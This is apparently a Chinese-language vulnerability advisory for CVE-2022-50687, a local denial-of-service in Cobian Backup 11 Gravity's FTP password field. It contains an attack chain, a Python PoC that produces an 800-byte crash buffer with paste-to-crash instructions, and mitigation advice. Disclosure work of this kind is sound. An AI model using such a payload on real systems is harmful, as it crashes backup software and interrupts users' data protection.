CVE-2022-50687 Cobian Backup 11 Gravity FTP密码字段拒绝服务漏洞

漏洞信息

漏洞编号

CVE-2022-50687

漏洞类型

拒绝服务/缓冲区溢出

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Cobian Backup 11 Gravity

漏洞概述

Cobian Backup 11 Gravity 11.2.0.582版本中存在一个拒绝服务漏洞，该漏洞位于软件的FTP密码输入字段中。攻击者可以通过构造特制的800字节缓冲区，并将其粘贴到FTP密码字段中，从而触发应用程序崩溃。此漏洞被标记为中等严重程度（CVSS 5.5），因为其攻击复杂度较低，无需特殊权限即可执行，且可能导致应用程序不可用。Cobian Backup是一款广泛使用的Windows备份软件，该漏洞的存在可能影响依赖该软件进行数据备份和灾难恢复的用户。攻击者需要本地访问目标系统才能利用此漏洞，这限制了漏洞的潜在影响范围。尽管如此，对于运行受影响版本的用户来说，及时采取防御措施是必要的，以防止应用程序意外崩溃导致备份任务中断。

技术细节

该漏洞是由于Cobian Backup 11 Gravity在处理FTP密码输入时缺乏适当的输入验证和边界检查所导致的。具体来说，当用户在FTP服务器配置界面的密码字段中输入或粘贴超长字符串（特别是约800字节的缓冲区）时，应用程序无法正确处理这种异常长度的输入。漏洞的根本原因在于密码处理函数没有对输入长度进行限制，导致缓冲区溢出。攻击者可以利用这一点，通过构造包含重复字符或特定模式的800字节字符串来触发栈或堆溢出。当应用程序尝试将该数据写入固定大小的缓冲区时，会发生内存损坏，最终导致进程崩溃或未定义行为。此漏洞影响本地认证用户，攻击向量为本地（AV:L），需要低权限（PR:L），无需用户交互（UI:N）。

攻击链分析

STEP 1

步骤1

攻击者获得目标系统的本地访问权限

STEP 2

步骤2

攻击者打开Cobian Backup 11 Gravity应用程序

STEP 3

步骤3

攻击者导航至FTP服务器配置或备份任务设置界面

STEP 4

步骤4

攻击者生成800字节的特殊构造缓冲区（PoC代码可生成）

STEP 5

步骤5

攻击者将800字节的缓冲区粘贴到FTP密码输入字段中

STEP 6

步骤6

应用程序尝试处理超长密码输入，触发缓冲区溢出

STEP 7

步骤7

应用程序崩溃，导致拒绝服务状态

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
CVE-2022-50687 PoC - Cobian Backup 11 Gravity FTP Password Field DoS
Description: Generate a specially crafted 800-byte buffer to trigger application crash
when pasted into the FTP password field of Cobian Backup 11 Gravity.
"""

def generate_payload(length=800):
    """Generate a buffer of specified length to trigger the DoS vulnerability."""
    # The payload consists of repeated 'A' characters
    # This triggers a buffer overflow when processed by the password field
    payload = 'A' * length
    return payload

def main():
    print("=" * 60)
    print("CVE-2022-50687 PoC - Cobian Backup 11 Gravity DoS")
    print("=" * 60)
    
    # Generate the 800-byte payload as described in the vulnerability
    payload = generate_payload(800)
    
    print(f"\n[+] Generated payload length: {len(payload)} bytes")
    print(f"[+] Payload preview: {payload[:50]}...")
    print("\n[!] Instructions:")
    print("1. Open Cobian Backup 11 Gravity")
    print("2. Navigate to FTP server configuration")
    print("3. Paste the generated payload into the FTP password field")
    print("4. Click OK or Apply to trigger the crash")
    print("\n[+] Payload saved to 'cve_2022_50687_payload.txt'")
    
    # Save payload to file for easy access
    with open('cve_2022_50687_payload.txt', 'w') as f:
        f.write(payload)

if __name__ == "__main__":
    main()

影响范围

Cobian Backup 11 Gravity 11.2.0.582

防御指南

临时缓解措施

由于该漏洞利用简单且影响特定功能，建议暂时避免使用Cobian Backup的FTP备份功能，或使用替代备份解决方案。同时，限制非授权用户访问安装了Cobian Backup的系统，确保只有受信任的管理员才能操作该应用程序。在等待官方修复期间，可以考虑使用其他备份软件作为临时替代方案。